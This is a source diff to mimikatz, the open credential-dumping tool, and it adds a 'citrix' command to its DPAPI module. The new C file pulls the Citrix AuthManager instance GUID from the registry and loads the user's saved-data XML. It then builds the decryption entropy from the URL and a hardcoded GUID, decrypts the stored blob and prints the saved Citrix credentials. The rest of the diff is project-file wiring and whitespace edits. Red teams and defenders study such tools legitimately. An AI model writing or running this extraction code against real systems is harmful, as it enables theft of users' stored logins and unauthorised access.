diff --git a/mimikatz/mimikatz.vcxproj b/mimikatz/mimikatz.vcxproj
index 3cf2c5d7..1fff23de 100644
--- a/mimikatz/mimikatz.vcxproj
+++ b/mimikatz/mimikatz.vcxproj
@@ -173,6 +173,7 @@
+
@@ -289,6 +290,7 @@
+
diff --git a/mimikatz/mimikatz.vcxproj.filters b/mimikatz/mimikatz.vcxproj.filters
index 87968706..05519879 100644
--- a/mimikatz/mimikatz.vcxproj.filters
+++ b/mimikatz/mimikatz.vcxproj.filters
@@ -329,6 +329,9 @@
common modules\rpc
+
+ local modules\dpapi\packages
+
@@ -677,6 +680,9 @@
common modules\rpc
+
+ local modules\dpapi\packages
+
diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.c b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
index 7d8671af..fdc3b029 100644
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.c
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
@@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
{kuhl_m_dpapi_cloudap_keyvalue_derived, L"cloudapkd", L""},
{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg", L""},
{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm", L""},
+ {kuhl_m_dpapi_citrix, L"citrix", L""},
{kuhl_m_dpapi_oe_cache, L"cache", NULL},
};
const KUHL_M kuhl_m_dpapi = {
diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.h b/mimikatz/modules/dpapi/kuhl_m_dpapi.h
index a51b4857..30b7b3d1 100644
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.h
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.h
@@ -20,6 +20,7 @@
#include "packages/kuhl_m_dpapi_lunahsm.h"
#include "packages/kuhl_m_dpapi_cloudap.h"
#include "packages/kuhl_m_dpapi_sccm.h"
+#include "packages/kuhl_m_dpapi_citrix.h"
const KUHL_M kuhl_m_dpapi;
diff --git a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
new file mode 100644
index 00000000..3ac4421d
--- /dev/null
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
@@ -0,0 +1,89 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_dpapi_citrix.h"
+
+const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
+{
+ PKULL_M_REGISTRY_HANDLE hRegistry;
+ PBYTE pbData;
+ DWORD cbData;
+ LPCWSTR szData;
+ LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
+ LPSTR sEntropy;
+ IXMLDOMDocument *pXMLDom;
+ IXMLDOMNode *pNode;
+ LPVOID pDataOut;
+ DWORD dwDataOutLen;
+
+ if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
+ {
+ kull_m_string_copy(&szGuid, szData);
+ }
+ else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
+ {
+ //For v3, KEY_WOW64_32KEY
+ kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
+ #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
+ L"WOW6432Node\\"
+ #endif
+ L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
+ kull_m_registry_close(hRegistry);
+ }
+
+ if(szGuid)
+ {
+ kprintf(L"Citrix instance GUID : %s\n", szGuid);
+
+ if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
+ {
+ kprintf(L"Using saved data from: %s\n", szData);
+ if(pXMLDom = kull_m_xml_CreateAndInitDOM())
+ {
+ if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
+ {
+ if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
+ {
+ szUrl = kull_m_xml_getAttribute(pNode, L"url");
+ if(szUrl)
+ {
+ kprintf(L"URL: %s\n", szUrl);
+ kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
+ if(sEntropy)
+ {
+ if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
+ {
+ if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
+ {
+ if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
+ {
+ if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
+ {
+ UrlUnescapeInPlace(szSavedCreds, 0);
+ kprintf(L" > Saved data: %s\n", szSavedCreds);
+ LocalFree(szSavedCreds);
+ }
+ LocalFree(pDataOut);
+ }
+ }
+ SysFreeString(szBase64);
+ }
+ LocalFree(sEntropy);
+ }
+ LocalFree(szUrl);
+ }
+ }
+ }
+ kull_m_xml_ReleaseDom(pXMLDom);
+ }
+ }
+ else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\)\n");
+ LocalFree(szGuid);
+ }
+ else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
+
+ return STATUS_SUCCESS;
+}
\ No newline at end of file
diff --git a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
new file mode 100644
index 00000000..441b5eb2
--- /dev/null
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
@@ -0,0 +1,9 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_dpapi.h"
+
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);
\ No newline at end of file
diff --git a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
index 38166a63..46c267ea 100644
--- a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
+++ b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
@@ -133,7 +133,6 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
}
-
RpcTryExcept
{
do
@@ -2276,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
kprintf(L" uidOriginatingDsa:");
kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
kprintf(L"\n");
-
}
kprintf(L"\n");
}